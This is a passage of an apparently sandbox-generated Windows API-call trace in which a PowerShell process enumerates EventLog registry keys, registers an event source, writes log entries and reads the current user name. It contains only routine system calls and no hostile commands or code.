	[0616.127] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x2, lpName=0x419ce0, lpcchName=0x28d608, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x28d608, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0616.127] CoTaskMemFree (pv=0x419ce0) 
	[0616.127] CoTaskMemFree (pv=0x0) 
	[0616.127] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0616.127] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x3, lpName=0x419ce0, lpcchName=0x28d608, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x28d608, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0616.128] CoTaskMemFree (pv=0x419ce0) 
	[0616.128] CoTaskMemFree (pv=0x0) 
	[0616.128] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0616.128] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x4, lpName=0x419ce0, lpcchName=0x28d608, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x28d608, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0616.128] CoTaskMemFree (pv=0x419ce0) 
	[0616.128] CoTaskMemFree (pv=0x0) 
	[0616.128] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0616.128] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x5, lpName=0x419ce0, lpcchName=0x28d608, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x28d608, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0616.128] CoTaskMemFree (pv=0x419ce0) 
	[0616.128] CoTaskMemFree (pv=0x0) 
	[0616.128] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0616.128] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x6, lpName=0x419ce0, lpcchName=0x28d608, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x28d608, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0616.128] CoTaskMemFree (pv=0x419ce0) 
	[0616.128] CoTaskMemFree (pv=0x0) 
	[0616.128] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0616.128] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x7, lpName=0x419ce0, lpcchName=0x28d608, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x28d608, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0616.128] CoTaskMemFree (pv=0x419ce0) 
	[0616.128] CoTaskMemFree (pv=0x0) 
	[0616.129] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0616.129] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x8, lpName=0x419ce0, lpcchName=0x28d608, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x28d608, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0616.129] CoTaskMemFree (pv=0x419ce0) 
	[0616.129] CoTaskMemFree (pv=0x0) 
	[0616.129] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d668 | out: phkResult=0x28d668*=0x354) returned 0x0
	[0616.129] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d668 | out: phkResult=0x28d668*=0x0) returned 0x2
	[0616.129] RegOpenKeyExW (in: hKey=0x350, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d668 | out: phkResult=0x28d668*=0x358) returned 0x0
	[0616.129] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d668 | out: phkResult=0x28d668*=0x0) returned 0x2
	[0616.129] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d668 | out: phkResult=0x28d668*=0x35c) returned 0x0
	[0616.129] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d668 | out: phkResult=0x28d668*=0x0) returned 0x2
	[0616.130] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d668 | out: phkResult=0x28d668*=0x360) returned 0x0
	[0616.130] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d668 | out: phkResult=0x28d668*=0x0) returned 0x2
	[0616.130] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d668 | out: phkResult=0x28d668*=0x364) returned 0x0
	[0616.130] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d668 | out: phkResult=0x28d668*=0x0) returned 0x2
	[0616.130] RegOpenKeyExW (in: hKey=0x350, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d668 | out: phkResult=0x28d668*=0x368) returned 0x0
	[0616.130] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d668 | out: phkResult=0x28d668*=0x0) returned 0x2
	[0616.130] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d668 | out: phkResult=0x28d668*=0x36c) returned 0x0
	[0616.130] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d668 | out: phkResult=0x28d668*=0x0) returned 0x2
	[0616.131] RegOpenKeyExW (in: hKey=0x350, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d668 | out: phkResult=0x28d668*=0x370) returned 0x0
	[0616.131] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d668 | out: phkResult=0x28d668*=0x0) returned 0x2
	[0616.131] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d668 | out: phkResult=0x28d668*=0x374) returned 0x0
	[0616.131] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d668 | out: phkResult=0x28d668*=0x378) returned 0x0
	[0616.131] RegCloseKey (hKey=0x378) returned 0x0
	[0616.131] RegCloseKey (hKey=0x350) returned 0x0
	[0616.132] RegCloseKey (hKey=0x374) returned 0x0
	[0616.133] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d608 | out: phkResult=0x28d608*=0x374) returned 0x0
	[0616.133] RegQueryInfoKeyW (in: hKey=0x374, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x28d57c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28d578, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x28d57c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28d578*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0616.133] CoTaskMemFree (pv=0x0) 
	[0616.133] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0616.133] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x0, lpName=0x419ce0, lpcchName=0x28d608, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x28d608, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0616.133] CoTaskMemFree (pv=0x419ce0) 
	[0616.133] CoTaskMemFree (pv=0x0) 
	[0616.133] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0616.133] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x1, lpName=0x419ce0, lpcchName=0x28d608, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x28d608, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0616.133] CoTaskMemFree (pv=0x419ce0) 
	[0616.133] CoTaskMemFree (pv=0x0) 
	[0616.133] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0616.133] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x2, lpName=0x419ce0, lpcchName=0x28d608, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x28d608, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0616.133] CoTaskMemFree (pv=0x419ce0) 
	[0616.133] CoTaskMemFree (pv=0x0) 
	[0616.133] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0616.133] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x3, lpName=0x419ce0, lpcchName=0x28d608, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x28d608, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0616.133] CoTaskMemFree (pv=0x419ce0) 
	[0616.133] CoTaskMemFree (pv=0x0) 
	[0616.134] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0616.134] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x4, lpName=0x419ce0, lpcchName=0x28d608, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x28d608, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0616.134] CoTaskMemFree (pv=0x419ce0) 
	[0616.134] CoTaskMemFree (pv=0x0) 
	[0616.134] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0616.134] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x5, lpName=0x419ce0, lpcchName=0x28d608, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x28d608, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0616.134] CoTaskMemFree (pv=0x419ce0) 
	[0616.134] CoTaskMemFree (pv=0x0) 
	[0616.134] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0616.134] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x6, lpName=0x419ce0, lpcchName=0x28d608, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x28d608, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0616.134] CoTaskMemFree (pv=0x419ce0) 
	[0616.134] CoTaskMemFree (pv=0x0) 
	[0616.134] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0616.134] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x7, lpName=0x419ce0, lpcchName=0x28d608, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x28d608, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0616.134] CoTaskMemFree (pv=0x419ce0) 
	[0616.134] CoTaskMemFree (pv=0x0) 
	[0616.134] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0616.134] RegEnumKeyExW (in: hKey=0x374, dwIndex=0x8, lpName=0x419ce0, lpcchName=0x28d608, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x28d608, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0616.134] CoTaskMemFree (pv=0x419ce0) 
	[0616.134] CoTaskMemFree (pv=0x0) 
	[0616.135] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d668 | out: phkResult=0x28d668*=0x350) returned 0x0
	[0616.135] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d668 | out: phkResult=0x28d668*=0x0) returned 0x2
	[0616.135] RegOpenKeyExW (in: hKey=0x374, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d668 | out: phkResult=0x28d668*=0x378) returned 0x0
	[0616.135] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d668 | out: phkResult=0x28d668*=0x0) returned 0x2
	[0616.135] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d668 | out: phkResult=0x28d668*=0x37c) returned 0x0
	[0616.135] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d668 | out: phkResult=0x28d668*=0x0) returned 0x2
	[0616.135] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d668 | out: phkResult=0x28d668*=0x380) returned 0x0
	[0616.135] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d668 | out: phkResult=0x28d668*=0x0) returned 0x2
	[0616.135] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d668 | out: phkResult=0x28d668*=0x384) returned 0x0
	[0616.136] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d668 | out: phkResult=0x28d668*=0x0) returned 0x2
	[0616.136] RegOpenKeyExW (in: hKey=0x374, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d668 | out: phkResult=0x28d668*=0x388) returned 0x0
	[0616.136] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d668 | out: phkResult=0x28d668*=0x0) returned 0x2
	[0616.136] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d668 | out: phkResult=0x28d668*=0x38c) returned 0x0
	[0616.136] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d668 | out: phkResult=0x28d668*=0x0) returned 0x2
	[0616.136] RegOpenKeyExW (in: hKey=0x374, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d668 | out: phkResult=0x28d668*=0x390) returned 0x0
	[0616.136] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d668 | out: phkResult=0x28d668*=0x0) returned 0x2
	[0616.136] RegOpenKeyExW (in: hKey=0x374, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d668 | out: phkResult=0x28d668*=0x394) returned 0x0
	[0616.136] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d668 | out: phkResult=0x28d668*=0x398) returned 0x0
	[0616.137] RegCloseKey (hKey=0x398) returned 0x0
	[0616.137] RegCloseKey (hKey=0x374) returned 0x0
	[0616.137] RegCloseKey (hKey=0x394) returned 0x0
	[0616.138] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d5d8 | out: phkResult=0x28d5d8*=0x394) returned 0x0
	[0616.138] RegQueryInfoKeyW (in: hKey=0x394, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x28d54c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28d548, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x28d54c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28d548*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0616.138] CoTaskMemFree (pv=0x0) 
	[0616.138] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0616.138] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x0, lpName=0x419ce0, lpcchName=0x28d5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x28d5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0616.138] CoTaskMemFree (pv=0x419ce0) 
	[0616.138] CoTaskMemFree (pv=0x0) 
	[0616.138] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0616.139] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x1, lpName=0x419ce0, lpcchName=0x28d5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x28d5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0616.139] CoTaskMemFree (pv=0x419ce0) 
	[0616.139] CoTaskMemFree (pv=0x0) 
	[0616.139] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0616.139] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x2, lpName=0x419ce0, lpcchName=0x28d5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x28d5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0616.139] CoTaskMemFree (pv=0x419ce0) 
	[0616.139] CoTaskMemFree (pv=0x0) 
	[0616.139] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0616.139] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x3, lpName=0x419ce0, lpcchName=0x28d5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x28d5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0616.139] CoTaskMemFree (pv=0x419ce0) 
	[0616.139] CoTaskMemFree (pv=0x0) 
	[0616.139] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0616.139] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x4, lpName=0x419ce0, lpcchName=0x28d5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x28d5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0616.139] CoTaskMemFree (pv=0x419ce0) 
	[0616.140] CoTaskMemFree (pv=0x0) 
	[0616.140] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0616.140] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x5, lpName=0x419ce0, lpcchName=0x28d5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x28d5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0616.140] CoTaskMemFree (pv=0x419ce0) 
	[0616.140] CoTaskMemFree (pv=0x0) 
	[0616.140] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0616.140] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x6, lpName=0x419ce0, lpcchName=0x28d5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x28d5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0616.140] CoTaskMemFree (pv=0x419ce0) 
	[0616.140] CoTaskMemFree (pv=0x0) 
	[0616.140] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0616.140] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x7, lpName=0x419ce0, lpcchName=0x28d5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x28d5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0616.140] CoTaskMemFree (pv=0x419ce0) 
	[0616.140] CoTaskMemFree (pv=0x0) 
	[0616.140] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0616.140] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x8, lpName=0x419ce0, lpcchName=0x28d5d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x28d5d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0616.141] CoTaskMemFree (pv=0x419ce0) 
	[0616.141] CoTaskMemFree (pv=0x0) 
	[0616.141] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d638 | out: phkResult=0x28d638*=0x374) returned 0x0
	[0616.141] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d638 | out: phkResult=0x28d638*=0x0) returned 0x2
	[0616.141] RegOpenKeyExW (in: hKey=0x394, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d638 | out: phkResult=0x28d638*=0x398) returned 0x0
	[0616.141] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d638 | out: phkResult=0x28d638*=0x0) returned 0x2
	[0616.141] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d638 | out: phkResult=0x28d638*=0x39c) returned 0x0
	[0616.141] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d638 | out: phkResult=0x28d638*=0x0) returned 0x2
	[0616.142] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d638 | out: phkResult=0x28d638*=0x3a0) returned 0x0
	[0616.142] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d638 | out: phkResult=0x28d638*=0x0) returned 0x2
	[0616.142] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d638 | out: phkResult=0x28d638*=0x3a4) returned 0x0
	[0616.142] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d638 | out: phkResult=0x28d638*=0x0) returned 0x2
	[0616.142] RegOpenKeyExW (in: hKey=0x394, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d638 | out: phkResult=0x28d638*=0x3a8) returned 0x0
	[0616.142] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d638 | out: phkResult=0x28d638*=0x0) returned 0x2
	[0616.142] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d638 | out: phkResult=0x28d638*=0x3ac) returned 0x0
	[0616.142] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d638 | out: phkResult=0x28d638*=0x0) returned 0x2
	[0616.142] RegOpenKeyExW (in: hKey=0x394, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d638 | out: phkResult=0x28d638*=0x3b0) returned 0x0
	[0616.143] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d638 | out: phkResult=0x28d638*=0x0) returned 0x2
	[0616.143] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d638 | out: phkResult=0x28d638*=0x3b4) returned 0x0
	[0616.143] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d638 | out: phkResult=0x28d638*=0x3b8) returned 0x0
	[0616.143] RegCloseKey (hKey=0x3b8) returned 0x0
	[0616.143] RegCloseKey (hKey=0x394) returned 0x0
	[0616.144] RegCloseKey (hKey=0x3b4) returned 0x0
	[0616.148] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b760008
	[0616.627] ReportEventW (hEventLog=0x1b760008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x34f82e8*="WSMan", lpRawData=0x34f8058) returned 1
	[0616.628] CoTaskMemAlloc (cb=0x104) returned 0x49d140
	[0616.628] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d140, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0616.628] CoTaskMemFree (pv=0x49d140) 
	[0616.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.630] CoTaskMemAlloc (cb=0x804) returned 0x1b901f20
	[0616.630] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b901f20, nSize=0x28d8c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x28d8c8) returned 0x1
	[0616.631] CoTaskMemFree (pv=0x1b901f20) 
	[0616.631] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0616.631] GetUserNameW (in: lpBuffer=0x419ce0, pcbBuffer=0x28d908 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x28d908) returned 1
	[0616.631] CoTaskMemFree (pv=0x419ce0) 
	[0616.632] ReportEventW (hEventLog=0x1b760008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x34fd820*="Alias", lpRawData=0x34fd5b0) returned 1
	[0616.633] CoTaskMemAlloc (cb=0x104) returned 0x49d140
	[0616.633] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d140, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0616.633] CoTaskMemFree (pv=0x49d140) 
